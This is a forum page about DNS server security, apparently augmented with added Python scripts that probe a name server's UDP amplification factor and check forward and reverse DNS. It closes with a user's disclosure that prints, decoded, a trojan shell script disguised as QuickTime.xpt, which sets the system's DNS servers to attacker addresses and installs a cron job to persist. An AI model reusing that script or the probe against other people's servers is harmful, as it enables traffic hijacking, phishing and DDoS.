DNS security - DDoS

I have a public name server (NS) on Windows Server 2008 R2.
A security firm has checked the server/DNS for threats/issues.
It states that there is a security issue: when a request 17 bytes long is made to the NS, the packet received in reply is 449 bytes long.
How do I fix this issue?

There's a whole collection of hotfixes for DNS on WS2008R2 SP1.
I'd suggest starting there.
http://blogs.technet.com/b/yongrhee/archive/2012/02/18/list-of-dns-related-hotfixes-post-sp1-for-windows-server-2008-r2-sp1.aspx
Lawrence Garvin, M.S., MCSA, MCITP:EA, MCDBA
SolarWinds Head Geek
Microsoft MVP - Software Packaging, Deployment & Servicing (2005-2014)
My MVP Profile: http://mvp.microsoft.com/en-us/mvp/Lawrence%20R%20Garvin-32101
http://www.solarwinds.com/gotmicrosoft
The views expressed on this post are mine and do not necessarily reflect the views of SolarWinds.
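As an added illustration (not part of the question or of the reply above), the following Python script shows why the audit's numbers matter. A DNS header is 12 bytes and a question for the root name "." is 1 byte of name plus 4 bytes of type/class, so a ". NS" or ". ANY" query is exactly 17 bytes. A server that answers it with a root referral (13 NS records plus glue), or that recurses for anyone, returns several hundred bytes, so a spoofed source address turns one small packet into a much larger one aimed at a victim. The `constructed_root_referral` function builds a sample response of that shape offline (constructed data, not captured traffic, with TEST-NET addresses as glue); `probe` sends the real 17-byte query over UDP and is only for servers you are authorised to test.

```python
"""Added example: measure a name server's UDP amplification exposure."""
import socket
import struct

QTYPES = {"A": 1, "NS": 2, "ANY": 255}
ROOT_SERVERS = [f"{chr(c)}.root-servers.net" for c in range(ord("a"), ord("m") + 1)]


def encode_name(name: str) -> bytes:
    """Wire-format a domain name (no compression); "." encodes as a single 0x00."""
    labels = [l for l in name.strip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name: str, qtype: str, txid: int = 0x1234, rd: bool = True) -> bytes:
    """Single-question query; RD set mimics what an open-resolver probe sends."""
    flags = 0x0100 if rd else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)


def parse_header(msg: bytes) -> dict:
    """Decode the header fields that matter for an amplification review."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),
        "aa": bool(flags & 0x0400),
        "tc": bool(flags & 0x0200),  # truncated: the TCP answer would be even bigger
        "ra": bool(flags & 0x0080),  # recursion available: should be False on a public authoritative NS
        "rcode": flags & 0x000F,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def amplification_factor(query: bytes, response: bytes) -> float:
    return len(response) / len(query)


def constructed_root_referral(query: bytes, ra: bool = False) -> bytes:
    """Constructed sample response (not captured traffic): a root referral with
    13 NS records and 13 A glue records, the kind of answer a server that still
    hands out its root hints gives to the 17-byte probe."""
    txid = struct.unpack("!H", query[:2])[0]
    flags = 0x8000 | (0x0080 if ra else 0)
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, len(ROOT_SERVERS), len(ROOT_SERVERS))
    authority = b""
    additional = b""
    for i, host in enumerate(ROOT_SERVERS):
        rdata = encode_name(host)
        authority += encode_name(".") + struct.pack("!HHIH", 2, 1, 518400, len(rdata)) + rdata
        addr = bytes([192, 0, 2, 1 + i])  # constructed glue addresses (TEST-NET-1), not the real ones
        additional += encode_name(host) + struct.pack("!HHIH", 1, 1, 518400, 4) + addr
    return header + query[12:] + authority + additional


def probe(server: str, name: str = ".", qtype: str = "NS", timeout: float = 2.0) -> dict:
    """Send the probe over UDP and report sizes and flags (network use)."""
    q = build_query(name, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        resp, _ = s.recvfrom(4096)
    report = parse_header(resp)
    report.update(query_bytes=len(q), response_bytes=len(resp),
                  factor=round(amplification_factor(q, resp), 1))
    return report


if __name__ == "__main__":
    q = build_query(".", "NS")
    r = constructed_root_referral(q)
    print(len(q), "byte query ->", len(r), "byte referral, factor",
          round(amplification_factor(q, r), 1), parse_header(r))
```

What to look for in a `probe` report: `ra` set on a public authoritative server means it recurses for the whole Internet, and on Windows DNS the fix is to turn recursion off (`dnscmd /Config /NoRecursion 1`) and keep authoritative and recursive roles on separate servers. If recursion is already off but a "." query still draws a large referral, the server is answering from its root hints; an authoritative-only server has no need for them. Response Rate Limiting, the usual mitigation on a server that must stay reachable, is not available in the 2008 R2 DNS server (it arrived with Windows Server 2016), so on this platform the remaining options are recursion off, root hints removed and rate limiting at the edge.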

Similar Messages

  • DNS security and  Dan Kaminski's bug?

    With the disclosure of Dan Kaminski's DNS security issue, has Apple announced their intentions on bug patching this?

    That's because you aren't an ISP. However, this issue can affect any DNS box running on OSX. It remains unpatched as of this writing, and it remains a threat. Sun, MS, Men&Mice, Redhat, SUSE -- they all had patches weeks ago. Apple? No. (oh, that's a quiet 'no').
    There are ISPs with Apple machines installed. Those machines represent a threat to the rest of the internet. A legal liability threat to those ISPs. And an embarrassment that every other major OS provider has both noted the problem and resolved it. Not Apple.
    Turn off recursion? That will help a bit. But this isn't some ******** little GUI bug or annoyance (as I usually post). It is a significant exploit that is known, out in the wild, and utterly unspoken of by our vendor here. It is a Problem. It is not something I can even get a 'we're aware of it and working on it' kind of reply from Apple.
    From this thread, do you think there might be reasons Apple doesn't penetrate the Enterprise, or why you perceive OSXS installs are only 'local Lans'?

  • How to enable DNSSEC - DNS Security validation in Resolver

    Hi,
    I would like to set my Mac to use DNSSEC (request secure answers and perform validation of answers). Anybody have an idea how to configure this?
    I understand BIND 9 is in the OS but don't know how/if it ties into the name (DNS) resolver library which the apps (like Safari etc) use. I've realized that the usual UNIX style config files like /etc/named.conf and /etc/resolv.conf aren't really in use (see the Mac OS notices inside them).
    This originally started as the ISP (Rogers) started displaying their own ad-ridden search page for mis-typed/non-existent domain names typed into the web browser address bar. There was an opt out, which I used, but then it started displaying a highly annoying copy of Internet Exploder's DNS error page. Lately they started redirecting my Safari default home page (when starting Safari or shift-cmd-H) to their own website instead of what I've configured Safari with (I actually use the default http://livepage.apple.com/, call me lame). So much for net neutrality...
    DNSSEC may not solve this particular problem, since not all domains are secured anyways, but I'd like to try the option for other obvious reasons too.
    PS. I couldn't find a topic on this. Apologies if there is already a thread on this topic and please direct me there if you know of it.
    Cheers and hope you're having happy holidays!
    Thanks in Advance!

    If you want to report this issue to Apple's engineering, send a bug report or an enhancement request via its Bug Reporter system. To do this, join the Apple Developer Connection (ADC)—it's free and available for all Mac users and gets you a look at some development software. Since you already have an Apple username/ID, use that. Once a member, go to Apple BugReporter and file your bug report or enhancement request. The nice thing with this procedure over submitting feedback is that you get a response and a follow-up number; thus, starting a dialog with engineering.

  • Dynamic DNS updates and issues with re-imaged / replaced machines with the same computer name

    Our AD team gets asked frequently to delete bad DNS entries because a computer was replaced or VDI was re-created, and when it was joined to the domain it had the same computer name but a different SID, so the DNS entry for that computer can no longer be updated to a new IP address because the new computer doesn't have rights to update that object in DNS.
    I recently saw a resolution to this was to set the security for DNS to allow updates from "Domain Computers" as described in the KB below.
    http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2005210
    Has anyone done this?  Any negative implications from this?
    Thanks

    Granting all domain computers write access to all records in the DNS zone does solve the problem. On the negative side, DNS security is reduced significantly. For example, any user with admin rights locally on his/her computer will be able to sabotage services in your domain by deleting or changing host records of domain controllers, servers or other client computers.
    A more secure solution in this case will be configuring DHCP servers to update DNS on behalf of the client and granting DHCP servers appropriate access to the DNS zone. Take a look at Configuring Secure Dynamic Update for more info.
    Gleb.

  • DNS - is it necessary on a LAN?

    Hoping someone more advanced than I can help me out - I'm the defacto network admin for a small design shop and we currently have an Xserve G3 running Mac OS X Server 10.3 - I'm going through the Mac OS Server Essentials course (the book version, not the real taught-by-a-pro version -- we don't have that much cash on-hand!) but am by no means a newbie to the basics of networking.
    Our G3 currently handles simple file sharing only. Our DHCP services, DNS services and firewall are all handled by a Cisco PIX unit that's managed by an outside firm that's completely overcharging us to manage. Add to that, they haven't been able to get the VPN services in the PIX to actually work. So, long story short, I want to pull these services in-house to save costs and get rid of these yo-yos controlling my PIX, and resell the PIX. It's overkill for what we need.
    My question is this - After upgrading, I want to use my G3 Xserve to handle file sharing, DHCP addressing, and utilize the VPN services to access our network apps from outside (I Really really really want to work from home again!)... Do I need to establish DNS services on my LAN for this to work, or can I simply rely on an outside DNS and not enable the DNS services on my Xserve?
    We host only 1 website that's reachable exclusively by IP address via a link on an externally hosted site. Currently through the PIX, this site is not reachable from our LAN (and that's OK - we have a back door to it that works just fine). Any response would be most appreciated. If more info as to IP addresses or specific configurations are needed, please email me directly at [email protected] I'd prefer to keep that info off the boards.
    Thanks in advance!

    I agree with Jim Pattison's overall suggestion that you don't need an internal DNS server in most cases for a small office configuration (or small home office, for that matter). Your ISP will provide DNS resolvers for getting at hosts on the Internet, and if your ISP hosts your domain, they'll provide DNS hosting services for any Internet-visible servers you wish the world to know about.
    Where local DNS services comes in handy (and it's important to make the distinction between DNS serving and DNS resolving), is if you:
    1) Want the ability to refer to your local printers, workstations, or servers by name, such as "office-printer" or "berts-mac", or "mail-server", etc., without knowing numeric addresses or using the ".local" convention that works sometimes, but not always, on the Mac.
    2) If you want to enable Kerberos authentication under Open Directory, then it's vital that the OD Master and all of its replicas have working forward and reverse DNS definitions. By 'working' I mean that the forward DNS of each server name matches its IP address, and the reverse DNS of that address matches the server name. Kerberos won't work without matching forward and reverse DNS.
    3) Portable home directories, and other advanced network services won't work unless forward and reverse DNS is defined for the OS X servers. I'm not sure why that is the case, but I do know it is required.
    If your OS X servers are on Internet-visible IP addresses, then their forward DNS can be made part of the DNS definitions your ISP provides. Whether or not your ISP will define matching reverse DNS is another matter -- the better ISPs will provide reverse DNS for your servers. If you run an Internet-visible mail server, for example, then it's important for the rest of the world to see matching forward and reverse DNS definitions or many mail servers will reject your mail thinking you're a spammer.
    If your OS X servers are on internal IP addresses -- like 192.168.*.*, 10.*.*.*, 172.*.*.* -- then you need to have one or more OS X Servers (or other servers) providing forward and reverse DNS if you want to take advantage of any of the advanced server features mentioned earlier.
    A DNS CASE STUDY
    At my company, we have a public domain hosted by our ISP (call it mydomain.com). In addition to DNS hosting for that domain, they also provide a couple of DNS resolvers we can point our workstations at. We have two OS X Servers on internal IP addresses 192.168.1.100 and 192.168.1.102 running DNS services -- one is the master and one is a slave. We opted to do DNS programming directly in BIND, which means manually editing the /etc/named.conf file, rather than relying on the graphic front end in Tiger Server Admin. This is simply because we wanted to do more advanced things than you could define via the Server Admin front end.
    Our DNS definitions basically provide for:
    1) Forward DNS for a local.mydomain.com domain to provide names for systems on our LAN. This is where the OS X servers reside -- server1.local.mydomain.com resolves to 192.168.1.100 and server2.local.mydomain.com resolves to 192.168.1.102.
    2) Reverse DNS for the 192.168.0.*, 192.168.1.* and 192.168.2.* address ranges. 192.168.1.100 resolves to server1.local.mydomain.com and 192.168.1.102 resolves to server2.local.mydomain.com.
    3) DNS forwarding, so that if you ask about anything not defined by our forward and reverse DNS zones (like discussions.apple.com, for example), our DNS resolvers pass the request to our ISP rather than try to resolve and cache the answer ourselves. This significantly improves performance, as the ISP can answer our queries much faster than we can perform the lookups starting with the root servers ourselves. This is purely a performance issue.
    4) DNS security -- Only folks on our 192.168.*.* local area network can ask about the local.mydomain.com domain. It's not visible outside our local network, thus improving security.
    5) Since our servers have matching forward and reverse DNS addresses on the local.mydomain.com domain, we can make use of Kerberos authentication, portable home directories, and so on. These don't work unless your OS X servers have matching forward and reverse DNS -- regardless of who provides the DNS services.
    DNS / BIND RESOURCES
    I based our /etc/named.conf on an excellent article I found online at <http://www.zytrax.com/books/dns/ch6/>. I also recommend O'Reilly & Associates "DNS & Bind" book -- <http://www.oreilly.com/catalog/dns4/index.html>. This is a good way to learn how to build DNS servers.
    If folks are curious, I can post our /etc/named.conf file.
    Xserve G4   Mac OS X (10.4.6)   1GB RAM
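The case study above hinges on one checkable condition: every server's forward record must point at an address whose PTR points back at that name. As an added example (not code from the poster), this Python script performs that round trip for a list of hosts. It takes the forward and reverse lookups as callables so it can run against the live system resolver or, as here, against constructed zone data that mirrors the case study's addresses; the host names other than server1/server2 and the broken entries are assumptions made for the demonstration.

```python
"""Added example: verify that forward and reverse DNS agree for a set of servers."""
import socket
from typing import Callable, Dict, List

Forward = Callable[[str], List[str]]   # name -> IPv4 addresses
Reverse = Callable[[str], List[str]]   # address -> PTR names


def system_forward(name: str) -> List[str]:
    """Forward lookup through the OS resolver."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def system_reverse(addr: str) -> List[str]:
    """Reverse (PTR) lookup through the OS resolver."""
    try:
        host, aliases, _ = socket.gethostbyaddr(addr)
        return [host] + aliases
    except (socket.herror, socket.gaierror):
        return []


def normalise(name: str) -> str:
    return name.rstrip(".").lower()


def check_host(name: str, forward: Forward = system_forward,
               reverse: Reverse = system_reverse) -> Dict[str, object]:
    """Round-trip every address of `name` back through PTR and report mismatches."""
    addrs = forward(name)
    result = {"name": name, "addresses": addrs, "ok": False, "problems": []}
    if not addrs:
        result["problems"].append("no A record")
        return result
    for addr in addrs:
        ptrs = [normalise(p) for p in reverse(addr)]
        if not ptrs:
            result["problems"].append(f"{addr}: no PTR record")
        elif normalise(name) not in ptrs:
            result["problems"].append(f"{addr}: PTR {ptrs} does not name {name}")
        else:
            # PTR names this host; also require every PTR name to resolve back to the address
            for p in ptrs:
                if addr not in forward(p):
                    result["problems"].append(f"{addr}: PTR {p} does not resolve back to {addr}")
    result["ok"] = not result["problems"]
    return result


def check_hosts(names, forward: Forward = system_forward,
                reverse: Reverse = system_reverse) -> List[Dict[str, object]]:
    return [check_host(n, forward, reverse) for n in names]


# Constructed zone data mirroring the case study's addresses (offline stand-in for BIND).
CONSTRUCTED_A = {
    "server1.local.mydomain.com": ["192.168.1.100"],
    "server2.local.mydomain.com": ["192.168.1.102"],
    "mail.local.mydomain.com": ["192.168.1.110"],   # assumed host, PTR deliberately missing
    "web.local.mydomain.com": ["192.168.1.120"],    # assumed host, PTR deliberately wrong
}
CONSTRUCTED_PTR = {
    "192.168.1.100": ["server1.local.mydomain.com"],
    "192.168.1.102": ["server2.local.mydomain.com"],
    "192.168.1.120": ["www.local.mydomain.com"],
}


def constructed_forward(name: str) -> List[str]:
    return CONSTRUCTED_A.get(normalise(name), [])


def constructed_reverse(addr: str) -> List[str]:
    return CONSTRUCTED_PTR.get(addr, [])


if __name__ == "__main__":
    for r in check_hosts(CONSTRUCTED_A, constructed_forward, constructed_reverse):
        print("OK " if r["ok"] else "BAD", r["name"], r["problems"])
```

Run it with the default `system_forward`/`system_reverse` and the real server names from a workstation that uses the internal resolvers; a "no PTR record" or "does not name" line for an OD master is the reason Kerberos fails, and the same condition on an Internet-facing mail server's public address is what other mail servers check before accepting mail.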

  • Mobile Challenge 4/8/2013 – 4/19/2013

    MOBILE CHALLENGE CONTEST INFORMATION
    This Contest opens on February 11th, 2013 with a new challenge every two weeks until July 31st  2013.
    Which of these statements is not correct about Cisco ACE appliance?
    A.  Has features like hardware based compression, Flash Forward and SSL acceleration.
    B.  Has Role Based Access Control (RBAC) and supports up to 250 virtual devices with failover.
    C.  Provides layer 4 and 7 content switching, application security and protection from DNS based DDoS attacks.
    D.  Consolidates data center by reducing the number of servers and load balancers required.
    CONTEST RULES: How to Enter
    MOBILE CHALLENGE CONTEST INFORMATION
    Step 1: Download and register on the Cisco Technical Support Mobile App on your mobile device. If you are already a registered member of the  Cisco Technical Support Mobile App, please skip Step 1 and go to Step 2.
    Step 2: To participate in this challenge, Login and go to Browse Communities  under Support Community. Then find Online Tools and Resources > Cisco  Technical Support Mobile Apps > Mobile Challenge MM/DD/YYYY.  All  challenges will be named Mobile Challenge followed by the start date.
    Step 3: Post your response to the challenge question using the mobile app by the end date.
    Note:  To post your response, click on Reply from the Action menu. On iOS, the  Action menu is available from the Action button on the top right of the  page and on Android the Action overflow in the Action bar displays the  Reply option.
    The winner will be announced on 4/22/2013.
    JUDGING CRITERIA. 
    All  entries marked with correct answers, received during the Mobile  Challenge Period above will be entered into a bi-weekly random drawing  where the winner will be selected by a representative of Sponsor from  among all eligible entries received.  The drawing will be held at the  end of each contest period during the challenge Period.
    The Sponsor’s decision will be final in all matters.  Odds of winning depend on the total number of eligible entries received by the Sponsor.
    For full rules and eligibility please visit the official contest rules page.

    Tricky...
    My guess is B.
    The ACE Appliance does not support 250 virtual devices, that looks more like the ACE module for Cat6K
    Thanks,
    Johan
    Sent from Cisco Technical Support iPad App

  • Asa 5505 problems

    Problem with ASA 5505. After 45 min-1h, and later on, the internet is down. Any solution?
    hostname DarrkoEOOD
    domain-name default.domain.invalid
    enable password my encrypted
    names
    interface Vlan1
    nameif inside
    security-level 50
    ip address 89.x.x.65 255.255.255.192
    interface Vlan2
    nameif Evrokom
    security-level 90
    ip address 89.x.x.66 255.255.255.252
    interface Vlan3
    description Evrocom-DNS_Blackhole
    nameif DNS
    security-level 0
    ip address 10.0.0.1 255.255.255.252
    interface Ethernet0/0
    description LAN
    interface Ethernet0/1
    description Evrokom
    switchport access vlan 2
    interface Ethernet0/2
    description Evrocom-DNS_Blackhole
    switchport access vlan 3
    interface Ethernet0/3
    interface Ethernet0/4
    interface Ethernet0/5
    interface Ethernet0/6
    interface Ethernet0/7
    passwd my encrypted
    ftp mode passive
    clock timezone EEDT 2
    clock summer-time EEDT recurring last Sun Mar 3:00 last Sun Oct 3:00
    dns server-group DefaultDNS
    domain-name default.domain.invalid
    same-security-traffic permit inter-interface
    same-security-traffic permit intra-interface
    access-list IPSAllowedOutsideInterface extended permit ip host 71.169.2.10 any
    access-list IPSAllowedOutsideInterface extended permit ip host 72.89.63.208 any
    access-list IPSAllowedOutsideInterface extended permit ip 69.64.222.0 255.255.255.0 any
    access-list IPSAllowedOutsideInterface extended permit ip host 77.85.217.18 any
    access-list IPSAllowedOutsideInterface extended permit ip host 62.204.140.9 any
    access-list IPSAllowedOutsideInterface extended permit tcp 213.226.0.0 255.255.0.0 any eq ssh
    access-list IPSAllowedOutsideInterface extended deny tcp any any eq 3389
    access-list IPSAllowedOutsideInterface extended deny tcp any any eq ssh
    access-list IPSAllowedOutsideInterface extended permit ip any any
    pager lines 24
    logging timestamp
    logging buffer-size 1048576
    logging buffered debugging
    logging asdm informational
    mtu inside 1500
    mtu Evrokom 1500
    mtu DNS 1500
    no failover
    icmp unreachable rate-limit 1 burst-size 1
    icmp permit any inside
    icmp permit any Evrokom
    asdm image disk0:/asdm-522.bin
    no asdm history enable
    arp timeout 14400
    global (Evrokom) 10 interface
    nat (inside) 10 89.215.168.64 255.255.255.192
    access-group IPSAllowedOutsideInterface in interface inside
    access-group IPSAllowedOutsideInterface out interface inside
    access-group IPSAllowedOutsideInterface in interface Evrokom
    access-group IPSAllowedOutsideInterface out interface Evrokom
    route Evrokom 0.0.0.0 0.0.0.0 89.215.174.65 1 track 1
    route Evrokom 217.9.224.2 255.255.255.255 89.215.174.65 1 track 2
    timeout xlate 3:00:00
    timeout conn 1:00:00 half-closed 0:20:00 udp 1:00:00 icmp 0:00:05
    timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
    timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
    timeout uauth 0:05:00 absolute
    username admin password rj3RJA7.tmoyw8bB encrypted privilege 15
    username thegrave password my encrypted privilege 15
    aaa authentication ssh console LOCAL
    http server enable
    http 62.x.x.9 255.255.255.255 Evrokom
    http 213.x.x.0 255.255.255.0 Evrokom
    no snmp-server location
    no snmp-server contact
    snmp-server enable traps snmp authentication linkup linkdown coldstart
    service resetinbound interface inside
    track 1 rtr 1 reachability
    track 2 rtr 2 reachability
    telnet timeout 5
    ssh 72.x.x.208 255.255.255.255 Evrokom
    ssh 213.x.x.0 255.255.0.0 Evrokom
    ssh 67.x.x.39 255.255.255.255 Evrokom
    ssh 62.x.x.9 255.255.255.255 Evrokom
    ssh 77.x.x.18 255.255.255.255 Evrokom
    ssh timeout 5
    ssh version 2
    console timeout 0
    dhcpd lease 32000
    dhcpd address 89.x.x.66-89.215.168.125 inside
    dhcpd dns 217.x.x.2 212.39.90.42 interface inside
    dhcpd enable inside
    ntp server 129.6.15.29 source Evrokom
    ntp server 129.6.15.28 source Evrokom prefer
    prompt hostname context
    Cryptochecksum:xxx
    : end

    Use this Cisco ASA 5500 Series Adaptive Security Appliances Troubleshoot and Alerts
    http://www.cisco.com/en/US/products/ps6120/tsd_products_support_troubleshoot_and_alerts.html

  • How to manage IP address assignment for laptops?

    Dear All,
    I'm looking for an efficient way to manage IP address assignment for laptops.
    I have a DHCP server with reservation for all my devices.
    Laptops usually have 2 NICs: LAN and WiFi card.
    So, how can I manage the IP assignment for these devices?
    If I make a DHCP reservation with two different IP addresses, I can have problems with DNS round-robin.
    Should I enable the DNS secure dynamic update for domain members and then reserve two different IP addresses on DHCP?
    I don't want that user needs to manually change their NIC configuration.
    What you suggest?
    Thanks

    The best way to manage it would be to "not" manage it. DHCP by definition is supposed to be "dynamic". DHCP reservations are great for a few devices that live under "special circumstances", but you never want to set reservations for everything; if you do that then just don't have DHCP to start with and statically assign everything.
    The combination of DHCP with dynamically updated DNS in AD means you never have to know or ever care what the IP# is. Everything is referred to by its hostname.
    Some things to keep in mind:
    Every interface has a different MAC, meaning the laptops have two MACs. Therefore it is impossible to reserve the same IP# for both. So they end up with a different IP# depending on which NIC they use. Running two laptop NICs on the same LAN at the same time is always bad. Either always use the wireless, or always turn off the wireless NIC when laptops are local within your facility and can use the physical NIC. In other words pick one or the other; never allow both to work at the same time. This is a responsibility and education issue of the user; you can't do this for them.
    Users cannot change their own network IP specs unless they are Local Administrators on their machines, and they should never be allowed to be Local Administrators.

  • HT1296 Comcast does not allow me to use iCloud to sync my iPhone.  An apple genius gave me a special DNS server to allow syncing.  That did not work at home.  So I used a secure proxy server outside the US, and then was able to sync.

    Comcast claims they are not blocking ports. Technically, from what I understand, they are not. They just don't recognize the iCloud server address on their DNS. An Apple Genius gave me a "free access DNS" which they use in the Oakridge store to sync to iCloud. It works great in the store with my computer and iPhone but not at home. After a conversation with an IT person in Germany he explained that due to the limited number of ports available and the almost infinite appetite for ports, companies often choose to manage the number of ports available for use by their customers. What did work for me was to use a secure proxy server with secure encoding. It works great! However, as the cloud does seem to go down from time to time, I would prefer to also have the USB cable option for syncing.

    This does not make sense. If comcast blocked iCloud.com there would be millions of posts here about it, as comcast is one of the largest ISPs in the US. Most likely you have DNS settings messed up in your router or your computer. Ports and DNS have nothing to do with each other. A "port" is just part of a complete URL. Using a port does not have any affect on the ISP, who doesn't even see the port in the packet.

  • ClamAV and DNS Failure with Security Update 2010-005

    Hey everyone, got a bit of an issue.
    I'm running Leopard Server 10.5.8 and I've noticed a very odd issue with the latest security update, (2010-005).
    Since the update, whenever ClamAV goes out to check for new definitions and database updates, all of my DNS clients lose connection during the few minutes that it's working. I've verified this by watching the logs as the updates happen. Everything is fine, and the second that ClamAV starts running, DNS fails on all the clients, then starts again after the update process.
    Anyone else notice this? And more importantly, how should I go about disabling ClamAV, since I don't run a mail server off this particular server.
    Thanks!

    The System Info below your post indicates that you are running OS X 10.5.8. The FaceTime Beta requires a minimum of OS X 10.6.4.

  • How do I remove Comodo Secure DNS in Firefox? It keeps interfering with and stops me going to websites I want to see.

    I originally installed Comodo as a Firewall but then uninstalled it as I found it very annoying with the Comodo Secure DNS redirecting and stopping me going to websites I choose to go to ... the last time was for weebly.com. The firewall uninstalled OK but the Secure DNS is still active and I can't find where to disable it and remove the code.

    Hello mirth27, check whether anything from Comodo still exists in Start > Control Panel > Programs > Programs and Features, and remove it.
    Then you can search the [http://en.wikipedia.org/wiki/Windows_Registry registry] to delete everything related to Comodo: Start > type '''regedit''' into the search area > hit Enter > click Yes if prompted by UAC. You are now in the Registry Editor; go to File > Export to make a copy of your registry in case something goes wrong, then go to Edit > Find > type '''comodo''' and you have all the keys the program created and that were not deleted by uninstalling the Comodo firewall. Now you have to delete every key related to Comodo............'''not so easy''', I think!
    http://windows.microsoft.com/en-us/windows/back-up-registry#1TC=windows-7
    thanks again

  • Security issue in DNS ! Update bind.

    Apparently there is a massive security issue in DNS protocol : http://securosis.com/2008/07/08/dan-kam … -released/
    or http://www.kb.cert.org/vuls/id/800113
    I am surprised I haven't seen any post on the forum about it. For now a solution could be to update bind to 9.5.0-P1 (I don't know if the one in testing is this particular one, there is no "P1").
    Every DNS server has to be upgraded since the issue is in the protocol, not in the code !

    A lot of systems got updated yesterday/today. I just checked a Windows Server 2003 x64 RC2 at work; yesterday it was vulnerable, but today it's reported safe after the recent security updates (this site offers some kind of check: http://www.doxpara.com/)
    I believe all the "big" ones in Linux did release an update yesterday, so there's probably plentiful of patches around... which is beyond the limits of my brain cells at the moment.

  • Odd DNS problems with wireless using WPA security.

    My partner and I have two Macbooks, hers is the white 1.83Ghz and mine is the white 2.0Ghz. The 1.83 with the latest updates (10.4.8) connects just fine and browses fine, no issues what-so-ever. My 2.0Ghz (also on latest update 10.4.8) does connect through WPA as well, but fails to browse with what appears to be DNS failures.
    The console spews out messages like "mDNSResponder: Repeated transitions for interface en1 (192.168.2.102); delaying packets by 5 seconds"
    Repeated refreshes of the browsers (Safari and Firefox) have mixed responses but mostly just timeout trying to connect to anything.
    I have tried all the tricks that I have heard about, including reinstalling OS X from scratch (wiping out the disk), removing the preferred connections, removing keychains, deleting the ~/Library/Preferences/com.apple.internet... files etc. All with no apparent change.
    The machine connects just fine and browses fine with no security or WEP set on the router. Just seems to be related to WPA. The router does not support WPA2 so I can't test that. I have tried 'nslookup' and 'host' in the terminal and get mixed responses. Sometimes it looks up quickly and fine, all the while the browser is timing out in the background on the same host name. Other times those commands also time out with messages like:
    ;; connection timed out; no servers could be reached
    The /etc/resolv.conf shows the nameserver to be 192.168.2.1 (my router) which is correct as it is the same on the other MacBook and Windows machines. I did, however, try setting the DNS servers manually to my ISP's servers in the Network Preferences but this made no difference. It is bizarre that two MacBooks with what I believe to be identical OS and updates (10.4.8) can have such different results. It is definitely related to WPA, but how it is broken and why I don't know - but it appears to me to be DNS related because pinging and browsing to IP addresses presents no problems.
    Any tips on things I can try next would be most helpful. Thanks, Chad.
    Macbook 2.0Ghz C2D (white)
      Mac OS X (10.4.8)  

    Yes, same problem here since the Airport update.
    Used to have trouble reconnecting after sleep but I solved that problem by deleting then reseting my "Preferred Network" setting.
    But since the update the MacBook just loses the connection to the internet. It seems to stay connected to the router (Linksys) and can see my iMac on Bonjour but not Internet connectivity.
    On your clue, I disabled WPA and it hooked right up and seems to be working fine.
    Now I just have to wait and see if it loses the connection spontaneously over the next few hours.
    I don't know why one of your MacBooks is working and the other isn't. Were they both updated last week with the Airport update?
    Intel 20" iMac + MacBook 2.0   Mac OS X (10.4.7)   Cube 450 G4

  • QT Plugins mucking with DNS servers via scutil? Possible security issue?

    Does anyone know why I would have a QuickTime.xpt file that needs to be run as root via 'cron' every minute?
    (* * * * * \"/Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1)
    The script itself looks up the 'PrimaryService' ID in State:/Network/Global/IPv4 and then creates entries for State:/Network/Service/<PrimaryServiceID>/DNS for 2 server addresses.
    The current value of these addresses is:
    85.225.113.141 c-8d71e155.11-500-64736c10.cust.bredbandsbolaget.se
    85.225.112.232 ua-85-225-112-132.cust.bredbandsbolaget.se.
    The other 'flakey' thing about this script is that it's crudely encrypted via:
    #!/bin/sh
    x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aaw.asa;s2=cx.zxx.aaz.zwz;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
    #!/bpf/oy
    daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
    PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
    Which translates to:
    #!/bin/sh
    path="/Library/Internet Plug-Ins"
    PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
    open
    get State:/Network/Global/IPv4
    d.show
    quit
    EOF
    /usr/sbin/scutil << EOF
    open
    d.init
    d.add ServerAddresses * $1 $2
    set State:/Network/Service/$PSID/DNS
    quit
    EOF
    exist=`crontab -l|grep QuickTime.xpt`
    if [ "$exist" == "" ]; then
    echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
    crontab cron.inst
    rm -rf cron.inst
    fi
    rm -rf "$0"
    I am apparently not the only one who has seen this, but no one has posted anything definitively about what this came from, and why it is there. I'm inclined to both delete the script and remove the crontab entry, but want to make sure that some obscure Quicktime or other plug-in doesn't require it. I suspect that the "QuickTime.xpt" name is a smoke screen to make the unaware user THINK that it is an Apple specified file.
    This may not be posted in the proper forum, so I will be reposting it under Networking and Mac OSX Leopard, since I've only seen it on my 10.5 system. (Hmmm. Shouldn't there be a security section somewhere?)

    Duh! Never mind.
    Took me less time to check the net via Google and determine it's a known 'trojan' attempt, than it took me to type up the question intelligently.
    Well, at least it's now on Record in the Apple forums somewhere. Moderators, feel free to delete these two posts, or move them to the most appropriate forum.
    "In OS X 10.5, your DNS entries will be altered to point to a malicious server to handle further requests. This can be disastrous if you are using Paypal, your online bank controls, or any other heavily phished targets."
